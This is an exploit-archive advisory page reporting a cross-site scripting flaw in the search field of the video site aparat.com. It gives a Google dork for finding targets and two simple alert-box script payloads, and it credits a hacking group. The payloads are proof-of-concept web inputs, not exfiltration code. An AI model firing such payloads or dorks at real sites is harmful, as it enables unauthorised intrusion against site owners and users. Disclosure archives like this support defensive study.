aparat Cross Site Scripting

2017.03.27
ir Turk@Xtra (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

########################## # Exploit Title: aparat Cross Site Scripting # Google Dork : intext: "aparat.com" # Date:2017-03-12 # Discovered By:Turk@Xtra # Tested on : Win7 ########################## # Vulnerability is the site search field An attacker using script code can do your attack After searching the attackers script code 404 is facing the same situation again click on Checker can see your attack <script>alert('Xss!')</script> "><script>alert(/Xss/)</script> ########################## # Demo : http://www.aparat.com/ ############################# # Thanks to : the Group Priv8_T34M ~~> Blackwolf||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson. # Channel Priv8_T34M : https://t.me/PRIV8_T34M # Iranian Anonymous # Discovered By: Saman.Khan


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top